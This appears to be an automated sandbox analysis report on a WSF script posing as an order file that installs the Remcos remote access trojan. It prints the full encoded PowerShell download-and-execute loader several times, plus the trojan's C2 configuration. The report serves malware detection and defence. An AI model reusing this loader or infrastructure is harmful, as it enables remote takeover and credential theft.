Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Order_DEC2024.wsf

Overview

General Information

Sample name:Order_DEC2024.wsf
Analysis ID:1568135
MD5:c209a2bdfa9028df5da14abdc1fc58ce
SHA1:17b2e2192cccdde3bc51197285ccdc5a0dc80587
SHA256:a2e71163d56c1feb4714e20d8b559bcf005e10b9044d9565afa0e257b0eb4d62
Tags:wsfuser-julianmckein
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected VBS Downloader Generic
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Installs a global keyboard hook
Maps a DLL or memory area into another process
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Silenttrinity Stager Msbuild Activity
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7264 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order_DEC2024.wsf" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7360 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $maremma = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JG5lbmhvID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGFsdm9yb3RhciA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGNob3N0cmEgPSAkYWx2b3JvdGFyLkRvd25sb2FkRGF0YSgkbmVuaG8pOyRwZXJpZ29zYW1lbnRlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNob3N0cmEpOyRtZXhlcm90byA9ICc8PEJBU0U2NF9TVEFSVD4+JzskbHVwYW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JGVuY2FyZGlyID0gJHBlcmlnb3NhbWVudGUuSW5kZXhPZigkbWV4ZXJvdG8pOyRuaXN0byA9ICRwZXJpZ29zYW1lbnRlLkluZGV4T2YoJGx1cGFudGUpOyRlbmNhcmRpciAtZ2UgMCAtYW5kICRuaXN0byAtZ3QgJGVuY2FyZGlyOyRlbmNhcmRpciArPSAkbWV4ZXJvdG8uTGVuZ3RoOyRjdW5ldGEgPSAkbmlzdG8gLSAkZW5jYXJkaXI7JGF1bGljaXNtbyA9ICRwZXJpZ29zYW1lbnRlLlN1YnN0cmluZygkZW5jYXJkaXIsICRjdW5ldGEpOyRkZWJpbGl0YW1lbnRvID0gLWpvaW4gKCRhdWxpY2lzbW8uVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGF1bGljaXNtby5MZW5ndGgpXTskZWxlbWllaXJhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZGViaWxpdGFtZW50byk7JGxldmFkb3VyYSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGVsZW1pZWlyYSk7JGVzY290YSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlc2NvdGEuSW52b2tlKCRudWxsLCBAKCcwL2ZoY3dvL3IvZWUuZXRzYXAvLzpzcHR0aCcsICdiaWNoYW5jcm9zJywgJ2JpY2hhbmNyb3MnLCAnYmljaGFuY3JvcycsICdNU0J1aWxkJywgJ2JpY2hhbmNyb3MnLCAnYmljaGFuY3JvcycsJ2JpY2hhbmNyb3MnLCdiaWNoYW5jcm9zJywnYmljaGFuY3JvcycsJ2JpY2hhbmNyb3MnLCdiaWNoYW5jcm9zJywnMScsJ2JpY2hhbmNyb3MnKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$escumar = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($maremma));Invoke-Expression $escumar MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 7816 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • MSBuild.exe (PID: 7824 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • MSBuild.exe (PID: 7936 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\psbaiipwgpfutbdtwagt" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • MSBuild.exe (PID: 7944 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\rmosjaaquxxzehzxflbutck" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • MSBuild.exe (PID: 7960 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\bgtlktksifpmgonbwwooehfgzfy" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • MSBuild.exe (PID: 7976 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\bgtlktksifpmgonbwwooehfgzfy" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["lewisham1122.ddnsking.com:6426:1"], "Assigned name": "4", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-L31JDJ", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
Order_DEC2024.wsfJoeSecurity_VBS_Downloader_GenericYara detected VBS Downloader GenericJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
      SourceRuleDescriptionAuthorStrings
      00000007.00000002.4122174513.0000000002A6F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000007.00000002.4120281726.0000000000FD7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000007.00000002.4120281726.0000000000FEB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
                Click to see the 12 entries
                SourceRuleDescriptionAuthorStrings
                7.2.MSBuild.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  7.2.MSBuild.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                    7.2.MSBuild.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                      7.2.MSBuild.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                      • 0x6b6f8:$a1: Remcos restarted by watchdog!
                      • 0x6bc70:$a3: %02i:%02i:%02i:%03i
                      7.2.MSBuild.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                      • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
                      • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                      • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                      • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                      • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                      • 0x65a04:$str_b2: Executing file:
                      • 0x6683c:$str_b3: GetDirectListeningPort
                      • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                      • 0x66380:$str_b7: \update.vbs
                      • 0x65a2c:$str_b9: Downloaded file:
                      • 0x65a18:$str_b10: Downloading file:
                      • 0x65abc:$str_b12: Failed to upload file:
                      • 0x66804:$str_b13: StartForward
                      • 0x66824:$str_b14: StopForward
                      • 0x662d8:$str_b15: fso.DeleteFile "
                      • 0x6626c:$str_b16: On Error Resume Next
                      • 0x66308:$str_b17: fso.DeleteFolder "
                      • 0x65aac:$str_b18: Uploaded file:
                      • 0x65a6c:$str_b19: Unable to delete:
                      • 0x662a0:$str_b20: while fso.FileExists("
                      • 0x65f49:$str_c0: [Firefox StoredLogins not found]
                      Click to see the 7 entries
                      SourceRuleDescriptionAuthorStrings
                      amsi64_7360.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                        amsi64_7360.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                          System Summary

                          barindex
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $maremma = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JG5lbmhvID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGFsdm9yb3RhciA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGNob3N0cmEgPSAkYWx2b3JvdGFyLkRvd25sb2FkRGF0YSgkbmVuaG8pOyRwZXJpZ29zYW1lbnRlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNob3N0cmEpOyRtZXhlcm90byA9ICc8PEJBU0U2NF9TVEFSVD4+JzskbHVwYW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JGVuY2FyZGlyID0gJHBlcmlnb3NhbWVudGUuSW5kZXhPZigkbWV4ZXJvdG8pOyRuaXN0byA9ICRwZXJpZ29zYW1lbnRlLkluZGV4T2YoJGx1cGFudGUpOyRlbmNhcmRpciAtZ2UgMCAtYW5kICRuaXN0byAtZ3QgJGVuY2FyZGlyOyRlbmNhcmRpciArPSAkbWV4ZXJvdG8uTGVuZ3RoOyRjdW5ldGEgPSAkbmlzdG8gLSAkZW5jYXJkaXI7JGF1bGljaXNtbyA9ICRwZXJpZ29zYW1lbnRlLlN1YnN0cmluZygkZW5jYXJkaXIsICRjdW5ldGEpOyRkZWJpbGl0YW1lbnRvID0gLWpvaW4gKCRhdWxpY2lzbW8uVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGF1bGljaXNtby5MZW5ndGgpXTskZWxlbWllaXJhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZGViaWxpdGFtZW50byk7JGxldmFkb3VyYSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGVsZW1pZWlyYSk7JGVzY290YSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlc2NvdGEuSW52b2tlKCRudWxsLCBAKCcwL2ZoY3dvL3IvZWUuZXRzYXAvLzpzcHR0aCcsICdiaWNoYW5jcm9zJywgJ2JpY2hhbmNyb3MnLCAnYmljaGFuY3JvcycsICdNU0J1aWxkJywgJ2JpY2hhbmNyb3MnLCAnYmljaGFuY3JvcycsJ2JpY2hhbmNyb3MnLCdiaWNoYW5jcm9zJywnYmljaGFuY3JvcycsJ2JpY2hhbmNyb3MnLCdiaWNoYW5jcm9zJywnMScsJ2JpY2hhbmNyb3MnKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$escumar = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($maremma));Invoke-Expression $escumar, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $maremma = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbG
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $maremma = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JG5lbmhvID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGFsdm9yb3RhciA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGNob3N0cmEgPSAkYWx2b3JvdGFyLkRvd25sb2FkRGF0YSgkbmVuaG8pOyRwZXJpZ29zYW1lbnRlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNob3N0cmEpOyRtZXhlcm90byA9ICc8PEJBU0U2NF9TVEFSVD4+JzskbHVwYW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JGVuY2FyZGlyID0gJHBlcmlnb3NhbWVudGUuSW5kZXhPZigkbWV4ZXJvdG8pOyRuaXN0byA9ICRwZXJpZ29zYW1lbnRlLkluZGV4T2YoJGx1cGFudGUpOyRlbmNhcmRpciAtZ2UgMCAtYW5kICRuaXN0byAtZ3QgJGVuY2FyZGlyOyRlbmNhcmRpciArPSAkbWV4ZXJvdG8uTGVuZ3RoOyRjdW5ldGEgPSAkbmlzdG8gLSAkZW5jYXJkaXI7JGF1bGljaXNtbyA9ICRwZXJpZ29zYW1lbnRlLlN1YnN0cmluZygkZW5jYXJkaXIsICRjdW5ldGEpOyRkZWJpbGl0YW1lbnRvID0gLWpvaW4gKCRhdWxpY2lzbW8uVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGF1bGljaXNtby5MZW5ndGgpXTskZWxlbWllaXJhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZGViaWxpdGFtZW50byk7JGxldmFkb3VyYSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGVsZW1pZWlyYSk7JGVzY290YSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlc2NvdGEuSW52b2tlKCRudWxsLCBAKCcwL2ZoY3dvL3IvZWUuZXRzYXAvLzpzcHR0aCcsICdiaWNoYW5jcm9zJywgJ2JpY2hhbmNyb3MnLCAnYmljaGFuY3JvcycsICdNU0J1aWxkJywgJ2JpY2hhbmNyb3MnLCAnYmljaGFuY3JvcycsJ2JpY2hhbmNyb3MnLCdiaWNoYW5jcm9zJywnYmljaGFuY3JvcycsJ2JpY2hhbmNyb3MnLCdiaWNoYW5jcm9zJywnMScsJ2JpY2hhbmNyb3MnKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$escumar = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($maremma));Invoke-Expression $escumar, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $maremma = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbG
                          Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 104.21.84.67, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7264, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                          Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 178.237.33.50, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7824, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49742
                          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.21.84.67, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7264, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                          Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order_DEC2024.wsf", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order_DEC2024.wsf", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order_DEC2024.wsf", ProcessId: 7264, ProcessName: wscript.exe
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $maremma = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JG5lbmhvID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGFsdm9yb3RhciA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGNob3N0cmEgPSAkYWx2b3JvdGFyLkRvd25sb2FkRGF0YSgkbmVuaG8pOyRwZXJpZ29zYW1lbnRlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNob3N0cmEpOyRtZXhlcm90byA9ICc8PEJBU0U2NF9TVEFSVD4+JzskbHVwYW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JGVuY2FyZGlyID0gJHBlcmlnb3NhbWVudGUuSW5kZXhPZigkbWV4ZXJvdG8pOyRuaXN0byA9ICRwZXJpZ29zYW1lbnRlLkluZGV4T2YoJGx1cGFudGUpOyRlbmNhc